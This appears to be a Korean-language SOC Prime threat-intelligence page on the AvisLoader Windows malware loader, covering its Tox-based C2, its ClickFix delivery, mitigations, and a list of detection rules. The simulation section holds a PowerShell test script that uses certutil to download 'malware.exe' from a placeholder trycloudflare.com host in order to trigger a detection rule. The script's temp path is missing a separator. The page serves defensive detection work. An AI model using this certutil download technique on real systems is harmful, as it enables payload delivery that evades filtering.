SOC Prime Bias: High

25 Sep 2026 08:27 UTC

AvisLoader가 강력한 Windows 멀웨어 로더로 부상하다

Author Photo
SOC Prime Team linkedin icon 팔로우
AvisLoader가 강력한 Windows 멀웨어 로더로 부상하다
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

AvisLoader는 새롭게 식별된 Windows 악성코드 로더로, Tox 피어 투 피어(P2P) 메시징 네트워크를 명령과 제어(C2) 통신에 사용합니다. 이 분산된 접근 방식은 운영자들이 고정된 도메인이나 중앙 서버에 의존하지 않고도 연결성을 유지하고 컨트롤러를 이동할 수 있게 합니다. 이 악성코드는 주로 Cloudflare 인프라에 호스팅된 ClickFix 사회공학 기만책을 통해 배포됩니다.

조사

Varonis 위협 연구소는 노출된 스테이징 서버에서 로더를 커맨드 센터 및 관련 도구와 함께 발견했습니다. 이 조사는 사용자가 명령을 실행하여 Cloudflare Quick Tunnels를 통해 페이로드를 가져오도록 지시하는 DocuSign 테마의 ClickFix 기만책을 식별했습니다. 실행 파일 분석에서는 Tox 기반의 C2 통신, UAC 우회 기능 및 악성 프로세스를 숨기도록 설계된 모듈이 발견되었습니다.

완화

조직들은 사용자들에게 명령을 터미널이나 Windows 실행 대화 상자에 붙여 넣으라고 요청하는 문서 서명 프롬프트를 인식하고 보고하도록 훈련해야 합니다. 보안 팀은 웹 기반 기만책에서 Cloudflare Workers와 Quick Tunnels의 의심스러운 사용을 모니터링해야 합니다. 예상치 못한 피어 투 피어(P2P) 네트워크 트래픽 및 데스크톱 바로 가기의 무단 변경을 감지하는 것도 위험을 줄이는 데 도움이 될 수 있습니다.

대응

AvisLoader 활동이 감지되면 보안 팀은 의심스러운 도메인 방문 후 실행된 명령 쉘과 스크립트 인터프리터의 프로세스 계보를 검토해야 합니다. 변경된 바로 가기를 찾기 위해 엔드포인트를 검사하며, .backup 파일과 VLCAssistant 아티팩트를 확인하세요. 네트워크 데이터도 영향받은 호스트에서 기인한 비정상적인 Tox 프로토콜 트래픽을 위해 검토해야 합니다.

공격 흐름

이 부분은 아직 업데이트 중입니다.

탐지

이름에 숫자만 포함된 의심스러운 실행 파일 (cmdline 통해)

SOC Prime 팀
2026년 9월 24일

의심스러운 Trycloudflare 도메인 통신 (dns 통해)

SOC Prime 팀
2026년 9월 24일

의심스러운 Curl 실행 시도 [MacOS] (cmdline 통해)

SOC Prime 팀
2026년 9월 24일

감지할 IOC (HashSha256): AvisLoader를 만나보세요: 제거를 견디도록 설계된 Windows 로더

SOC Prime AI 규칙
2026년 9월 24일

예상치 못한 Tox 또는 피어 투 피어 트래픽 감지 [Windows 네트워크 연결]

SOC Prime AI 규칙
2026년 9월 24일

명령 쉘 및 Cloudflare Quick Tunnel을 통한 원격 코드 실행 감지 [Windows 프로세스 생성]

SOC Prime AI 규칙
2026년 9월 24일

시뮬레이션 실행

  • 공격 내러티브 및 명령: 공격자가 워크스테이션에 초기 접근을 얻었습니다. 지속성을 유지하고 그들의 2차 모듈식 페이로드를 다운로드하기 위해, 이들은 Cloudflare Quick Tunnel을 사용하여 출구 필터링을 우회합니다. 공격자는 certutil.exe, 내장된 Windows 유틸리티를 사용하여 다음의 위치에서 페이로드를 다운로드합니다. https://malicious-tunnel-id.trycloudflare.com/payload.exe. 이 방법은 certutil 이 신뢰된 바이너리이고 트래픽이 합법적인 Cloudflare 인프라로 향하는 것처럼 보여 기본 네트워크 평판 필터로 탐지되지 않기 때문에 선택됩니다.

  • 회귀 테스트 스크립트:

    # 탐지 규칙을 유발하기 위한 시뮬레이션 스크립트.
    # 이는 trycloudflare.com 주소로부터의 다운로드를 시도하기 위해 certutil을 사용합니다.
    
    $targetUrl = "https://fake-tunnel-id-1234.trycloudflare.com/malware.exe"
    Write-Host "[*] 상대방 활동을 시뮬레이션 중: $targetUrl 에서의 다운로드 시도 중..."
    
    # 다음 명령어는 'selection_tunnel' 및 'selection_tools' 조건을 유발하도록 설계되었습니다.
    certutil.exe -urlcache -split -f "$targetUrl" "$env:TEMPmalware.exe"
    
    if ($LASTEXITCODE -eq 0) {
        Write-Host "[+] 시뮬레이션 명령이 성공적으로 실행되었습니다."
    } else {
        Write-Host "[-] 명령 실패 (URL이 존재하지 않을 경우 기대됨, 그러나 여전히 원격 검거가 생성되어야 합니다)."
    }
  • 정리 명령어:

    # 시뮬레이션된 페이로드 및 로컬 아티팩트를 제거하기 위한 정리 스크립트.
    $tempFile = "$env:TEMPmalware.exe"
    if (Test-Path $tempFile) {
        Remove-Item -Path $tempFile -Force
        Write-Host "[+] $tempFile 정리 완료"
    } else {
        Write-Host "[-] 정리할 아티팩트가 없습니다."
    }